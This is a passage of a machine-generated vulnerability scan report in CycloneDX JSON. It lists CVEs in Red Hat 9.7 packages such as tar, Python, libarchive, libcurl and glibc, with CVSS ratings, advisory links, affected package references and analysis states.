          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-5704",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        434
      ],
      "description": "A flaw was found in tar. A remote attacker could exploit this vulnerability by crafting a malicious archive, leading to hidden file injection with fully attacker-controlled content. This bypasses pre-extraction inspection mechanisms, potentially allowing an attacker to introduce malicious files onto a system without detection.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5704"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/10"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/11"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/12/2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5704"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455360"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5704"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5704"
        }
      ],
      "published": "2026-04-06T16:16:42+00:00",
      "updated": "2026-04-22T20:08:59+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2",
          "versions": [
            {
              "version": "2:1.34-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-5713",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        121,
        125
      ],
      "description": "The \"profiling.sampling\" module (Python 3.15+) and \"asyncio introspection capabilities\" (3.14+, \"python -m asyncio ps\" and \"python -m asyncio pstree\") features could be used to read and write addresses in a privileged process if that process connected to a malicious or \"infected\" Python process via the remote debugging feature. This vulnerability requires persistently and repeatedly connecting to the process to be exploited, even after the connecting process crashes with high likelihood due to ASLR.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5713"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/15/6"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5713"
        },
        {
          "url": "https://github.com/python/cpython/commit/289fd2c97a7e5aecb8b69f94f5e838ccfeee7e67"
        },
        {
          "url": "https://github.com/python/cpython/issues/148178"
        },
        {
          "url": "https://github.com/python/cpython/pull/148187"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/OG4RHARYSNIE22GGOMVMCRH76L5HKPLM/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5713"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5713"
        }
      ],
      "published": "2026-04-14T16:16:48+00:00",
      "updated": "2026-04-17T15:11:35+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-5745",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "A flaw was found in libarchive. A NULL pointer dereference vulnerability exists in the ACL parsing logic, specifically within the archive_acl_from_text_nl() function. When processing a malformed ACL string (such as a bare \"d\" or \"default\" tag without subsequent fields), the function fails to perform adequate validation before advancing the pointer. An attacker can exploit this by providing a maliciously crafted archive, causing an application utilizing the libarchive API (such as bsdtar) to crash, resulting in a Denial of Service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5745"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8944"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5745"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455921"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5745"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5745"
        }
      ],
      "published": "2026-04-07T16:16:32+00:00",
      "updated": "2026-05-03T15:15:58+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.5.3-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-5773",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "A flaw was found in libcurl. Due to a logical error in the connection reuse mechanism for SMB (Server Message Block) transfers, libcurl might reuse an existing SMB connection with a different share than intended. This vulnerability, categorized as CWE-488 (Exposure of Data Element to Wrong Session), could lead to the download of an incorrect file or the upload of a file to an unintended location when an application uses libcurl for SMB transfers.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5773"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5773"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5773.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5773"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5773"
        }
      ],
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-5928",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        127
      ],
      "description": "Calling the ungetwc function on a FILE stream with wide characters encoded in a character set that has overlaps between its single byte and multi-byte character encodings, in the GNU C Library version 2.43 or earlier, may result in an attempt to read bytes before an allocated buffer, potentially resulting in unintentional disclosure of neighboring data in the heap, or a program crash.\n\nA bug in the wide character pushback implementation (_IO_wdefault_pbackfail in libio/wgenops.c) causes ungetwc() to operate on the regular character buffer (fp->_IO_read_ptr) instead of the actual wide-stream read pointer (fp->_wide_data->_IO_read_ptr). The program crash may happen in cases where fp->_IO_read_ptr is not initialized and hence points to NULL. The buffer under-read requires a special situation where the input character encoding is such that there are overlaps between single byte representations and multibyte representations in that encoding, resulting in spurious matches. The spurious match case is not possible in the standard Unicode character sets.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5928"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5928"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5928"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33998"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5928"
        }
      ],
      "published": "2026-04-20T21:16:36+00:00",
      "updated": "2026-04-23T15:33:43+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
